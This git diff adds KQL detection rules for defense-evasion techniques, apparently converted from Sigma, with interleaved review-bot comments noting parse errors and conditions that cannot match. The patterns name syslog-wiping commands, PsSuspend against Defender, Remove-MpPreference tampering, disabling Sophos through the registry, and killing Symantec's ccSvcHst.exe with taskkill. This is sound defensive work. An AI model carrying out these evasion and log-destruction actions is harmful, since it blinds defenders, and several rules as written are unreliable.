+// - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995"))))
\ No newline at end of file
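Review bot: `ProcessCommandLine endswith "Wuauclt.exe"` misses the case where the launcher quotes the image path, because the command line then ends in `"` rather than in the file name, and that is exactly the no-argument shape this rule wants to catch. Both branches should tolerate a trailing quote, e.g. `trim_end(@'"+', ProcessCommandLine) endswith "wuauclt.exe"` (`endswith` is case-insensitive, so the mixed case in the literals buys nothing). I have not measured how often the quoted form shows up for this binary in MDE, so check your own telemetry before widening the rule.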
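Review bot: The second line of the description, `This might indicate potential process injection activity from a beacon or similar mechanisms.`, is emitted without a `//` prefix, so the generated file is not a valid KQL query; the converter has to comment every line of a multi-line Sigma description, not just the first. Also, `RemotePort` in `DeviceNetworkEvents` is an integer column and the query compares it with the string operator `in~` against quoted literals — I believe the engine rejects that (or at best it never matches), and the filter should read `not(RemotePort in (80, 139, 443, 445, 465, 587, 993, 995))`. The type handling lives in the backend rather than in this file, but every port-based rule in the commit will share the problem.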
diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql
new file mode 100644
index 00000000..44ca426a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Workstation Locking via Rundll32
+// Author: frack113
+// Date: 2022-06-04
+// Level: medium
+// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql
new file mode 100644
index 00000000..5d55774c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious X509Enrollment - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detect use of X509Enrollment
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administrative script
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql
new file mode 100644
index 00000000..2b07c6b5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious XOR Encoded PowerShell Command
+// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
+// Date: 2018-09-05
+// Level: medium
+// Description: Detects presence of a potentially xor encoded powershell command
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
new file mode 100644
index 00000000..d379c122
--- /dev/null
+++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
@@ -0,0 +1,12 @@
+// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-12
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - App-V clients
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
new file mode 100644
index 00000000..9810ca56
--- /dev/null
+++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
@@ -0,0 +1,10 @@
+// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-16
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql
new file mode 100644
index 00000000..8e98a66b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sysinternals PsSuspend Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: high
+// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
new file mode 100644
index 00000000..6b453a5d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
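Review bot: The description promises detection of PsSuspend against "critical processes such as AV or EDR", but the only target in the condition is `ProcessCommandLine contains "msmpeng.exe"`, so the documentation overstates what the query covers. Either narrow the description — `// Description: Detects Sysinternals PsSuspend being used to suspend Microsoft Defender's MsMpEng.exe, a defense-evasion step seen before payload execution` — or add a `// NOTE:` that the target list is intentionally minimal and that other AV/EDR image names should be appended to the `contains` clause when the environment runs them.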
@@ -0,0 +1,14 @@ +// Title: Syslog Clearing or Removal Via System Utilities +// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: high +// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Log rotation. +// - Maintenance. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains "journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog")) \ No 
newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql new file mode 100644 index 00000000..dc428207 --- /dev/null +++ b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql @@ -0,0 +1,12 @@ +// Title: Sysmon Configuration Update +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: medium +// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to update Sysmon configuration. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql new file mode 100644 index 00000000..5a9e25de --- /dev/null +++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql 
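Review bot: The redirection patterns in the final group (`" > /var/log/syslog"`, `":>/var/log/syslog"`, `" >| /var/log/syslog"` and friends) are shell syntax that the shell consumes before spawning anything, so they do not appear in the `ProcessCommandLine` of the child utility; they only fire when the whole script body or a `sh -c '…'` wrapper is itself the recorded command line. A `// NOTE:` on the `where` line saying so would stop analysts assuming an interactive `> /var/log/syslog` is covered. In the `rm` branch the inner `or ProcessCommandLine contains "/var/log/syslog"` is already implied by the outer condition, so any `rm` whose arguments mention syslog matches regardless of `-r`/`-f` — probably intended, but worth a one-line comment rather than leaving the reader to work out the redundancy.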
@@ -0,0 +1,14 @@
+// Title: Sysmon Driver Altitude Change
+// Author: B.Talebi
+// Date: 2022-07-28
+// Level: high
+// Description: Detects changes in Sysmon driver altitude value.
+If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate driver altitude change to hide sysmon
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
new file mode 100644
index 00000000..330c59d9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Sysmon Driver Unloaded Via Fltmc.EXE
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2019-10-23
+// Level: high
+// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql
new file mode 100644
index 00000000..7c808195
--- /dev/null
+++ b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql
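Review bot: The two suffix tests in the new `where` clause are ANDed — `RegistryKey endswith "\\Services*"` and `RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"` — and no string can end with both, so the query can never return a row; `*` is a literal character in KQL, not a wildcard. The first test should become `RegistryKey contains "\\Services\\"` or simply be dropped, since the second suffix is specific on its own. Note also that `DeviceRegistryEvents` carries the value name in `RegistryValueName` rather than appending it to `RegistryKey`, so the working shape is more likely `RegistryKey endswith "\\Instances\\Sysmon Instance" and RegistryValueName =~ "Altitude"` — confirm with a test write before relying on it. Finally, the description continuation `If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.` lacks a `//` prefix and makes the file invalid KQL.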
@@ -0,0 +1,10 @@
+// Title: System Control Panel Item Loaded From Uncommon Location
+// Author: Anish Bogati
+// Date: 2024-01-09
+// Level: medium
+// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
new file mode 100644
index 00000000..bf4db1ad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
@@ -0,0 +1,11 @@ +// Title: System File Execution Location Anomaly +// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-11-27 +// Level: high +// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith 
"\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql new file mode 100644 index 00000000..d4c7f2bf --- /dev/null +++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql 
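Review bot: In the WSL exclusion, `FolderPath startswith "C:\\Users\\'"` carries a stray `'` after the trailing backslash, so no real path satisfies it and the whole `\AppData\Local\Microsoft\WindowsApps\…\wsl.exe` filter is dead; store-installed WSL launched from a user profile will therefore alert at Level high on every run. It should read `FolderPath startswith "C:\\Users\\"`. This looks like a quoting artefact from the converter or the source YAML rather than intent, so the generator is worth auditing for the same pattern in other rules. The exclusions are also pinned to `C:\`, which is faithful to the upstream rule but will be noisy on hosts with a different system drive — a `// NOTE:` on that line would help whoever tunes it.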
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Via Sysctl - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
+This process is primarily used to detect and avoid virtualization and analysis environments.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
new file mode 100644
index 00000000..4acb55af
--- /dev/null
+++ b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
@@ -0,0 +1,12 @@
+// Title: Tamper Windows Defender Remove-MpPreference
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate PowerShell scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
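Review bot: The second line of the description, `+This process is primarily used to detect and avoid virtualization and analysis environments.`, is emitted without a `//` prefix, so the generated file has bare prose before `DeviceProcessEvents` and will not parse as KQL. This appears to be the converter writing a multi-line Sigma description line by line and commenting only the first; every continuation line needs the marker, e.g. `// This process is primarily used to detect and avoid virtualization and analysis environments.`. Separately, the `ProcessCommandLine contains "sysctl"` alternative subsumes `FolderPath endswith "/sysctl"` for most real sysctl launches and also matches any shell one-liner that merely mentions sysctl; if that breadth is intended it deserves a 'False Positives' entry.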
diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql
new file mode 100644
index 00000000..29b78207
--- /dev/null
+++ b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Tamper With Sophos AV Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects tamper attempts to sophos av functionality via registry key modification
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
new file mode 100644
index 00000000..5e2e5392
--- /dev/null
+++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
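Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` is the Sysmon `Details` rendering of a zero DWORD; as far as I know Defender for Endpoint's `DeviceRegistryEvents` reports the numeric value (`"0"`) and carries the type in `RegistryValueType`, so this rule would never fire on the table it now targets. The `RegistryKey contains "...\\Config\\SAVEnabled"` tests have the same origin problem: `SAVEnabled`, `SEDEnabled` and `Enabled` are value names, which MDE puts in `RegistryValueName` rather than appending to `RegistryKey`. Something like `RegistryValueType =~ "Dword" and RegistryValueData == "0" and ((RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config" and RegistryValueName in~ ("SAVEnabled", "SEDEnabled")) or (RegistryKey contains "\\Sophos\\SAVService\\TamperProtection" and RegistryValueName =~ "Enabled"))` fits the schema better; this is inferred from the table layout rather than from this diff, so verify against a live tamper event before merging.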
@@ -0,0 +1,13 @@
+// Title: Taskkill Symantec Endpoint Protection
+// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
+Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
new file mode 100644
index 00000000..748e26bb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
@@ -0,0 +1,10 @@
+// Title: Taskmgr as LOCAL_SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-18
+// Level: high
+// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql
new file mode 100644
index 00000000..1a84fbe5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql
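Review bot: The two description continuation lines beginning `+Symantec Endpoint Protection antivirus software services ...` and `+As a result, the NT AUTHORITY/SYSTEM user ...` are written without a `//` prefix, leaving bare prose before `DeviceProcessEvents`, so this file will fail to parse. Each continuation line of a multi-line description needs the comment marker, e.g. `// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command ...`; the 13-line hunk count confirms both lines are emitted as their own lines rather than folded into the `// Description:` line.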
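Review bot: `AccountName contains "AUTHORI"` (and the `AUTORI` variant) was lifted from a Sysmon `User` field that holds `NT AUTHORITY\SYSTEM`; in MDE `DeviceProcessEvents` the domain lives in `AccountDomain` and `AccountName` is just `system`, so this filter should not match any LOCAL_SYSTEM launch of taskmgr.exe. Matching on the SID is both schema-correct and language-independent, which is what the `AUTORI` spelling was trying to cover: `| where FolderPath endswith "\\taskmgr.exe" and AccountSid =~ "S-1-5-18"`. This is inferred from the table schema rather than from the diff, so confirm on a SYSTEM-launched process event before merging.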
@@ -0,0 +1,10 @@
+// Title: TeamViewer Log File Deleted
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql
new file mode 100644
index 00000000..b8d52e0a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Third Party Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
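Review bot: The TeamViewer rule selects from `DeviceFileEvents` with no `ActionType` constraint, so every write, rename or creation of a `TeamViewer_*.log` file — which TeamViewer produces continuously while running — satisfies the `where` clause, not just the deletion the title, description and t1070.004 tag describe. Add `and ActionType == "FileDeleted"` to the `where` clause (and `FileRenamed` if rotation-style removal should count) so the rule fires only on the event it claims to detect.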
diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
new file mode 100644
index 00000000..4a6a02a3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql
new file mode 100644
index 00000000..a16d7d8e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage - Image
